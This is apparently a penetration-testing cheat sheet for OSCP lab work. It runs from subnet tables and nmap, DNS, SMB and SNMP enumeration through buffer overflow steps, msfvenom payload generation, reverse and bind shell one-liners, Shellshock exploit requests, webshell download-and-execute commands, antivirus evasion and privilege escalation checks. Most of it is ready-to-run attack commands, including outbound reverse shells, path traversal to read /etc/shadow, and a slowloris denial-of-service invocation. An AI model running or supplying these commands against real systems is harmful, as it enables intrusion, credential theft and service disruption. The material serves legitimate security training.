/29 | 8 | 6 | 255.255.255.248 | 1/32
/28 | 16 | 14 | 255.255.255.240 | 1/16
/27 | 32 | 30 | 255.255.255.224 | 1/8
/26 | 64 | 62 | 255.255.255.192 | 1/4
/25 | 128 | 126 | 255.255.255.128 | 1/2
/24 | 256 | 254 | 255.255.255.0 | 1
/23 | 512 | 510 | 255.255.254.0 | 2
/22 | 1024 | 1022 | 255.255.252.0 | 4
/21 | 2048 | 2046 | 255.255.248.0 | 8
/20 | 4096 | 4094 | 255.255.240.0 | 16
/19 | 8192 | 8190 | 255.255.224.0 | 32
/18 | 16384 | 16382 | 255.255.192.0 | 64
/17 | 32768 | 32766 | 255.255.128.0 | 128
/16 | 65536 | 65534 | 255.255.0.0 | 256
- Set the ip address as a variable
`export ip=192.168.1.100 `
`nmap -A -T4 -p- $ip`
- Netcat port Scanning
`nc -nvv -w 1 -z $ip 3388-3390`
- Discover active IPs usign ARP on the network:
`arp-scan $ip/24`
- Discover who else is on the network
`netdiscover`
- Discover IP Mac and Mac vendors from ARP
`netdiscover -r $ip/24`
- Nmap stealth scan using SYN
`nmap -sS $ip`
- Nmap stealth scan using FIN
`nmap -sF $ip`
- Nmap Banner Grabbing
`nmap -sV -sT $ip`
- Nmap OS Fingerprinting
`nmap -O $ip`
- Nmap Regular Scan:
`nmap $ip/24`
- Enumeration Scan
`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
- Enumeration Scan All Ports TCP / UDP and output to a txt file
`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
- Nmap output to a file:
`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
- Quick Scan:
`nmap -T4 -F $ip/24`
- Quick Scan Plus:
`nmap -sV -T4 -O -F --version-light $ip/24`
- Quick traceroute
`nmap -sn --traceroute $ip`
- All TCP and UDP Ports
`nmap -v -sU -sS -p- -A -T4 $ip`
- Intense Scan:
`nmap -T4 -A -v $ip`
- Intense Scan Plus UDP
`nmap -sS -sU -T4 -A -v $ip/24`
- Intense Scan ALL TCP Ports
`nmap -p 1-65535 -T4 -A -v $ip/24`
- Intense Scan - No Ping
`nmap -T4 -A -v -Pn $ip/24`
- Ping scan
`nmap -sn $ip/24`
- Slow Comprehensive Scan
`nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
- Scan with Active connect in order to weed out any spoofed ports designed to troll you
`nmap -p1-65535 -A -T5 -sT $ip`
- Enumeration
-----------
- DNS Enumeration
- NMAP DNS Hostnames Lookup
`nmap -F --dns-server <dns server ip> <target ip range>`
- Host Lookup
`host -t ns megacorpone.com`
- Reverse Lookup Brute Force - find domains in the same range
`for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
- Perform DNS IP Lookup
`dig a domain-name-here.com @nameserver`
- Perform MX Record Lookup
`dig mx domain-name-here.com @nameserver`
- Perform Zone Transfer with DIG
`dig axfr domain-name-here.com @nameserver`
- DNS Zone Transfers
Windows DNS zone transfer
`nslookup -> set type=any -> ls -d blah.com `
Linux DNS zone transfer
`dig axfr blah.com @ns1.blah.com`
- Dnsrecon DNS Brute Force
`dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
- Dnsrecon DNS List of megacorp
`dnsrecon -d megacorpone.com -t axfr`
- DNSEnum
`dnsenum zonetransfer.me`
- NMap Enumeration Script List:
- NMap Discovery
[*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
- Nmap port version detection MAXIMUM power
`nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
- NFS (Network File System) Enumeration
- Show Mountable NFS Shares
`nmap -sV --script=nfs-showmount $ip`
- RPC (Remote Procedure Call) Enumeration
- Connect to an RPC share without a username and password and enumerate privledges
`rpcclient --user="" --command=enumprivs -N $ip`
- Connect to an RPC share with a username and enumerate privledges
`rpcclient --user="<Username>" --command=enumprivs $ip`
- SMB Enumeration
- SMB OS Discovery
`nmap $ip --script smb-os-discovery.nse`
- Nmap port scan
`nmap -v -p 139,445 -oG smb.txt $ip-254`
- Netbios Information Scanning
`nbtscan -r $ip/24`
- Nmap find exposed Netbios servers
`nmap -sU --script nbstat.nse -p 137 $ip`
- Nmap all SMB scripts scan
`nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
- Nmap all SMB scripts authenticated scan
`nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
- SMB Enumeration Tools
`nmblookup -A $ip `
`smbclient //MOUNT/share -I $ip -N `
`rpcclient -U "" $ip `
`enum4linux $ip `
`enum4linux -a $ip`
- SMB Finger Printing
`smbclient -L //$ip`
- Nmap Scan for Open SMB Shares
`nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
- Nmap scans for vulnerable SMB Servers
`nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
- Nmap List all SMB scripts installed
`ls -l /usr/share/nmap/scripts/smb*`
- Enumerate SMB Users
`nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
OR
`python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
- RID Cycling - Null Sessions
`ridenum.py $ip 500 50000 dict.txt`
- Manual Null Session Testing
Windows: `net use \\$ip\IPC$ "" /u:""`
Linux: `smbclient -L //$ip`
- SMTP Enumeration - Mail Severs
- Verify SMTP port using Netcat
`nc -nv $ip 25`
- POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
- SNMP Enumeration -Simple Network Management Protocol
- Fix SNMP output values so they are human readable
`apt-get install snmp-mibs-downloader download-mibs `
`echo "" > /etc/snmp/snmp.conf`
- SNMP Enumeration Commands
- `snmpcheck -t $ip -c public`
- `snmpwalk -c public -v1 $ip 1|`
- `grep hrSWRunName|cut -d\* \* -f`
- `snmpenum -t $ip`
- `onesixtyone -c names -i hosts`
- SNMPv3 Enumeration
`nmap -sV -p 161 --script=snmp-info $ip/24`
- Automate the username enumeration process for SNMPv3:
`apt-get install snmp snmp-mibs-downloader `
`wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
- SNMP Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
- MS SQL Server Enumeration
- Nmap Information Gathering
`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
- Webmin and miniserv/0.01 Enumeration - Port 10000
Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
- Linux OS Enumeration
- List all SUID files
`find / -perm -4000 2>/dev/null`
- Determine the current version of Linux
`cat /etc/issue`
- Determine more information about the environment
`uname -a`
- List processes running
`ps -xaf`
- List the allowed (and forbidden) commands for the invoking use
`sudo -l`
- List iptables rules
`iptables --table nat --list
iptables -vL -t filter
iptables -vL -t nat
iptables -vL -t mangle
iptables -vL -t raw
iptables -vL -t security`
- Windows OS Enumeration
- net config Workstation
- systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- hostname
- net users
- ipconfig /all
- route print
- arp -A
- netstat -ano
- netsh firewall show state
- netsh firewall show config
- schtasks /query /fo LIST /v
- tasklist /SVC
- net start
- DRIVERQUERY
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
- dir /s *pass* == *cred* == *vnc* == *.config*
- findstr /si password *.xml *.ini *.txt
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
- Vulnerability Scanning with Nmap
- Nmap Exploit Scripts
[*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
- Nmap search through vulnerability scripts
`cd /usr/share/nmap/scripts/
ls -l \*vuln\*`
- Nmap search through Nmap Scripts for a specific keyword
`ls /usr/share/nmap/scripts/\* | grep ftp`
- Scan for vulnerable exploits with nmap
`nmap --script exploit -Pn $ip`
- NMap Auth Scripts
[*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
- Nmap Vuln Scanning
[*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
- NMap DOS Scanning
`nmap --script dos -Pn $ip
NMap Execute DOS Attack
nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
http-slowloris.runforever=true`
- Scan for coldfusion web vulnerabilities
`nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
- Anonymous FTP dump with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- SMB Security mode scan with Nmap
`nmap -v -p 21 --script=ftp-anon.nse $ip-254`
- File Enumeration
- Find UID 0 files root execution
- `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
- Get handy linux file system enumeration script (/var/tmp)
`wget https://highon.coffee/downloads/linux-local-enum.sh `
`chmod +x ./linux-local-enum.sh `
`./linux-local-enum.sh`
- Find executable files updated in August
`find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
- Find a specific file on linux
`find /. -name suid\*`
- Find all the strings in a file
`strings <filename>`
- Determine the type of a file
`file <filename>`
- HTTP Enumeration
----------------
- Search for folders with gobuster:
`gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
- OWasp DirBuster - Http folder enumeration - can take a dictionary file
- Dirb - Directory brute force finding using a dictionary file
`dirb http://$ip/ wordlist.dict `
`dirb <http://vm/> `
Dirb against a proxy
- `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
- Nikto
`nikto -h $ip`
- HTTP Enumeration with NMAP
`nmap --script=http-enum -p80 -n $ip/24`
- Nmap Check the server methods
`nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
- Get Options available from web server
`curl -vX OPTIONS vm/test`
- Uniscan directory finder:
`uniscan -qweds -u <http://vm/>`
- Wfuzz - The web brute forcer
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
Recurse level 3
`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
<!-- -->
- Open a service using a port knock (Secured with Knockd)
for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
--max-retries 0 -p $x server\_ip\_address; done
- WordPress Scan - Wordpress security scanner
- wpscan --url $ip/blog --proxy $ip:3129
- RSH Enumeration - Unencrypted file transfer system
- auxiliary/scanner/rservices/rsh\_login
- Finger Enumeration
- finger @$ip
- finger batman@$ip
- TLS & SSL Testing
- ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
OUTPUT-FILE.html
- Proxy Enumeration (useful for open proxies)
- nikto -useproxy http://$ip:3128 -h $ip
- Steganography
> apt-get install steghide
>
> steghide extract -sf picture.jpg
>
> steghide info picture.jpg
>
> apt-get install stegosuite
- The OpenVAS Vulnerability Scanner
- apt-get update
apt-get install openvas
openvas-setup
- netstat -tulpn
- Login at:
https://$ip:9392
Buffer Overflows and Exploits
===================================================================================================================================
- DEP and ASLR - Data Execution Prevention (DEP) and Address Space
Layout Randomization (ASLR)
- Nmap Fuzzers:
- NMap Fuzzer List
[https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
- NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args
'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
-p 80 $ip
- Nmap DNS Fuzzer
nmap --script dns-fuzz --script-args timelimit=2h $ip -d
- MSFvenom
[*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
- Windows Buffer Overflows
- Controlling EIP
locate pattern_create
pattern_create.rb -l 2700
locate pattern_offset
pattern_offset.rb -q 39694438
- Verify exact location of EIP - [\*] Exact match at offset 2606
buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
- Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
- Use Mona to determine a module that is unprotected
- Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
- Use NASM to determine the HEX code for a JMP ESP instruction
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
00000000 FFE4 jmp esp
- Run Mona in immunity log window to find (FFE4) XEF command
!mona find -s "\xff\xe4" -m slmfc.dll
found at 0x5f4a358f - Flip around for little endian format
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
- MSFVenom to create payload
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
- Final Payload with NOP slide
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
- Create a PE Reverse Shell
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
-f
exe -o shell\_reverse.exe
- Create a PE Reverse Shell and Encode 9 times with
Shikata\_ga\_nai
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
-f
exe -e x86/shikata\_ga\_nai -i 9 -o
shell\_reverse\_msf\_encoded.exe
- Create a PE reverse shell and embed it into an existing
executable
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikata\_ga\_nai -i 9 -x
/usr/share/windows-binaries/plink.exe -o
shell\_reverse\_msf\_encoded\_embedded.exe
- Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
LPORT=443 -f exe -o met\_https\_reverse.exe
- Linux Buffer Overflows
- Run Evans Debugger against an app
edb --run /usr/games/crossfire/bin/crossfire
- ESP register points toward the end of our CBuffer
add eax,12
jmp eax
83C00C add eax,byte +0xc
FFE0 jmp eax
- Check for “Bad Characters” Process of elimination - Run multiple
times 0x00 - 0xFF
- Find JMP ESP address
"\\x97\\x45\\x13\\x08" \# Found at Address 08134597
- crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
"\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
- msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
"\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
- Connect to the shell with netcat:
nc -v $ip 4444
Shells
===================================================================================================================================
- Netcat Shell Listener
`nc -nlvp 4444`
- Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
(hint: sudo -l to see what you can run)
- You may encounter limited shells that use rbash and only allow you to execute a single command per session.
You can overcome this by executing an SSH shell to your localhost:
ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux
`python -c 'import pty; pty.spawn("/bin/sh")'`
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
`echo os.system('/bin/bash')`
`/bin/sh -i`
`perl —e 'exec "/bin/sh";'`
perl: `exec "/bin/sh";`
ruby: `exec "/bin/sh"`
lua: `os.execute('/bin/sh')`
From within IRB: `exec "/bin/sh"`
From within vi: `:!bash`
or
`:set shell=/bin/bash:shell`
From within vim `':!bash':`
From within nmap: `!sh`
From within tcpdump
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
From busybox `/bin/busybox telnetd -|/bin/sh -p9999`
- Pen test monkey PHP reverse shell
[http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
- php-findsock-shell - turns PHP port 80 into an interactive shell
[http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
- Perl Reverse Shell
[http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
- PHP powered web browser Shell b374k with file upload etc.
[https://github.com/b374k/b374k](https://github.com/b374k/b374k)
- Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
- Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
*Linux*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
*Windows*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
*Mac*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
**Web Payloads**
*PHP*
`msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
OR
`msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
*ASP*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`
*JSP*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`
*WAR*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
**Scripting Payloads**
*Python*
`msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`
*Bash*
`msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
*Perl*
`msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`
**Shellcode**
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
*Linux Based Shellcode*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Windows Based Shellcode*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Mac Based Shellcode*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
**Handlers**
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
- SBD.exe
sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.
sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative.
- Shellshock
- Testing for shell shock with NMap
`root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
- git clone https://github.com/nccgroup/shocker
`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
- Shell Shock SSH Forced Command
Check for forced command by enabling all debug output with ssh
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
- cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
- Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
File Transfers
============================================================================================================
- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.
- Simple Local Web Servers
- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server
- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
- Run a basic PHP http server
php -S $ip:80
- Creating a wget VB Script on Windows:
[*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo
The file can be run using the following syntax:
`C:\temp\cscript.exe webdl.vbs`
- Mounting File Shares
- Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
- HTTP Put
nmap -p80 $ip --script http-put --script-args
http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
- Uploading Files
-------------------------------------------------------------------------------------------------------------
- SCP
scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
scp localfile username@$ip:~/Folder/
scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~
- Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
`davtest -move -sendbd auto -url http://$ip`
https://github.com/cldrn/davtest
You can also upload a file using the PUT method with the curl command:
`curl -T 'leetshellz.txt' 'http://$ip'`
And rename it to an executable file using the MOVE method with the curl command:
`curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
- Upload shell using limited php shell cmd
use the webshell to download and execute the meterpreter
\[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
/tmp/evil" http://$ip/files/sh.php
\[curl -s --data "cmd=chmod 777 /tmp/evil"
http://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
- TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\\Users\\Offsec>tftp -i $ip get nc.exe
- FTP
apt-get update && apt-get install pure-ftpd
\#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
- Packing Files
-------------------------------------------------------------------------------------------------------------
- Ultimate Packer for eXecutables
upx -9 nc.exe
- exe2bat - Converts EXE to a text file that can be copied and
pasted
locate exe2bat
wine exe2bat.exe nc.exe nc.txt
- Veil - Evasion Framework -
https://github.com/Veil-Framework/Veil-Evasion
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Privilege Escalation
==================================================================================================================
*Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
- Linux Privilege Escalation
------------------------------------------------------------------------------------------------------------------------
- Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:
[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- Try the obvious - Maybe the user is root or can sudo to root:
`id`
`sudo su`
- Here are the commands I have learned to use to perform linux enumeration and privledge escalation:
What users can login to this box (Do they use thier username as thier password)?:
`grep -vE "nologin|false" /etc/passwd`
What kernel version are we using? Do we have any kernel exploits for this version?
`uname -a`
`searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"`
What applications have active connections?:
`netstat -tulpn`
What services are running as root?:
`ps aux | grep root`
What files run as root / SUID / GUID?:
find / -perm +2000 -user root -type f -print
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
What folders are world writeable?:
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
- There are a few scripts that can automate the linux enumeration process:
- Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.
- LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -
[https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)
- LinEnum - (Recently Updated)
[https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)
- linux-exploit-suggester (Recently Updated)
[https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
- Highon.coffee Linux Local Enum - Great enumeration script!
`wget https://highon.coffee/downloads/linux-local-enum.sh`
- Linux Privilege Exploit Suggester (Old has not been updated in years)
[https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
- Linux post exploitation enumeration and exploit checking tools
[https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
Handy Kernel Exploits
